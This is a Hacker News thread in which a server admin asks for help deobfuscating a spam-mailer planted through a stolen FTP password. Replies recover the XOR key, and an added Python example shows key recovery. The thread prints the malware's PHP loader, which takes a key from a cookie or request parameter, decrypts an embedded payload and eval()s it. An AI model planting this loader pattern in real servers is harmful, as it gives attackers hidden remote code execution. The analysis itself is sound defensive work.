Hacker News
Ask HN: Can you decrypt this evil thing?
7 points by noduerme on Jan 6, 2012 | 4 comments
The back story is, someone got a stolen FTP password to a client's account on a shared server and uploaded this. It's some kind of darkmailer, since I spent the next three days getting that server off blacklists. It doesn't look like the attacker got access outside the account. The account's been cleaned out, but I still don't know what else this might have done. I got one level of deobfuscation in -- that's the easy part -- but it looks like it takes an input string to decrypt what's inside that. There are two parts, one in PHP and the other in Perl.

http://pastebin.com/ctswucid

http://pastebin.com/vVjYrikW

The code is obfuscated as ASCII characters in the $e variable. It uses the PHP function 'xor' to 'decrypt' the code (I think the same method is used in evil.pl).

The PHP code is:

<?php
// Fallback for very old PHP builds that lack the $_COOKIE/$_POST/$_GET
// superglobals: alias them to the legacy HTTP_*_VARS arrays.
if (!@isset($_SERVER)) {
    $_COOKIE = &$HTTP_COOKIE_VARS;
    $_POST   = &$HTTP_POST_VARS;
    $_GET    = &$HTTP_GET_VARS;
}

// The XOR key is supplied by the attacker with each request: a cookie named
// 'key' first, then a POST field, then a GET parameter. Without it the
// payload never decrypts, which is why the file alone is unreadable.
$k = $_COOKIE['key'];
if (empty($k)) { $k = $_POST['key']; }
if (empty($k)) { $k = $_GET['key']; }

// decrypt() is repeating-key XOR: each full key-length block of the payload
// is XORed with the key, and the trailing partial block with a truncated key.
// The function is defined through eval() to keep its body out of plain view.
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){
        if(!$k){return;}
        $el=@strlen($e);
        $kl=@strlen($k);
        $rl=$el%$kl;
        $fl=$el-$rl;
        for($o=0;$o<$fl;$o+=$kl){
            $p=@substr($e,$o,$kl);
            $d.="$k"^"$p";
        }
        if($rl){
            $p=@substr($e,$fl,$rl);
            $k=@substr($k,0,$rl);
            $d.="$k"^"$p";
        }
        return($d);
    }');
}

// $d holds the obfuscated payload (assigned earlier in the file, not shown
// here); the decrypted PHP is executed directly.
$d = @decrypt($d, $k);
eval($d);

For the PHP script, the key is:

SjJVkE6rkRYj

and the decrypted evil script is here:

http://pastebin.com/z53aByWX

I didn't look at the Perl script.

And here's the decrypted Perl script: http://pastebin.com/7RDpTXDp

It does almost the same thing as the PHP script, and uses the same key :P
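The decrypt() routine in the posted loader is plain repeating-key XOR, and the two comments above recover the same 12-byte key for both the PHP and the Perl variant. The following Python is an added example, not code from the thread or from the malware: it ports the PHP loop, shows it is equivalent to cycling the key over the data, and demonstrates a known-plaintext key recovery, which is how an analyst gets the key when the attacker's request (and with it the `key` parameter) is not in the logs. The sample payload and the assumed known prefix are constructed for the demo; the only value taken from the thread is the key SjJVkE6rkRYj.

```python
"""Added example (not from the HN thread): repeating-key XOR as used by the
posted loader, plus known-plaintext key recovery against it."""
import itertools
from typing import Optional

KEY = b"SjJVkE6rkRYj"  # 12-byte key reported in the thread for both scripts


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Cycling the key over the data gives exactly the
    bytes the PHP decrypt() produces, including for inputs whose length is
    not a multiple of the key length (PHP's truncated-key tail block)."""
    if not key:  # PHP: if(!$k){return;}
        return b""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def xor_decrypt_literal(e: bytes, k: bytes) -> bytes:
    """Line-for-line port of the PHP loop, kept to show it equals xor_decrypt().
    PHP's string XOR truncates to the shorter operand, which zip() mirrors."""
    if not k:
        return b""
    el, kl = len(e), len(k)
    rl = el % kl          # bytes left over after the full blocks
    fl = el - rl          # length covered by full key-length blocks
    d = bytearray()
    for o in range(0, fl, kl):
        p = e[o:o + kl]
        d += bytes(a ^ b for a, b in zip(k, p))
    if rl:
        p = e[fl:fl + rl]
        d += bytes(a ^ b for a, b in zip(k[:rl], p))
    return bytes(d)


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """XOR is its own inverse, so the packer the attacker used is the same routine."""
    return xor_decrypt(data, key)


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> bytes:
    """Known-plaintext attack: with key_len bytes of plaintext known at the
    start of the payload, ciphertext XOR plaintext yields the key directly."""
    if len(known_plaintext) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


def guess_key(ciphertext: bytes, known_plaintext: bytes, max_len: int = 64) -> Optional[bytes]:
    """When the key length is unknown, try each length L shorter than the known
    prefix: derive a candidate from the first L bytes and keep it only if it
    decrypts the whole known prefix. The shortest consistent L wins, since a
    longer one would just be the same key repeated."""
    for key_len in range(1, min(max_len, len(known_plaintext) - 1) + 1):
        candidate = recover_key(ciphertext, known_plaintext, key_len)
        if xor_decrypt(ciphertext[:len(known_plaintext)], candidate) == known_plaintext:
            return candidate
    return None


# Constructed sample payload (assumption: a dropper of this kind opens with a
# predictable statement, which is all the known-plaintext attack needs).
SAMPLE_PAYLOAD = (
    b"error_reporting(0); set_time_limit(0); "
    b"$to = $_POST['to']; $body = $_POST['body']; mail($to, 'hi', $body);"
)
KNOWN_PREFIX = b"error_reporting(0); set_time_limit(0);"  # 38 bytes, longer than the key


def demo() -> dict:
    """Pack the sample with KEY, then recover KEY from ciphertext + known prefix."""
    ct = xor_encrypt(SAMPLE_PAYLOAD, KEY)
    return {
        "roundtrip_ok": xor_decrypt(ct, KEY) == SAMPLE_PAYLOAD,
        "literal_port_matches": xor_decrypt_literal(ct, KEY) == xor_decrypt(ct, KEY),
        "recovered_key": recover_key(ct, KNOWN_PREFIX, len(KEY)),
        "guessed_key": guess_key(ct, KNOWN_PREFIX),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

On a real sample, feed the raw `$d`/`$e` string from the PHP (or the equivalent from the Perl) as `ciphertext` and guess a prefix such as the opening statement of the decrypted pastes above; because the key is only 12 bytes, a few dozen bytes of known plaintext are enough, and the request-supplied `key` parameter adds no secrecy beyond that.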

Thank you!!!!!
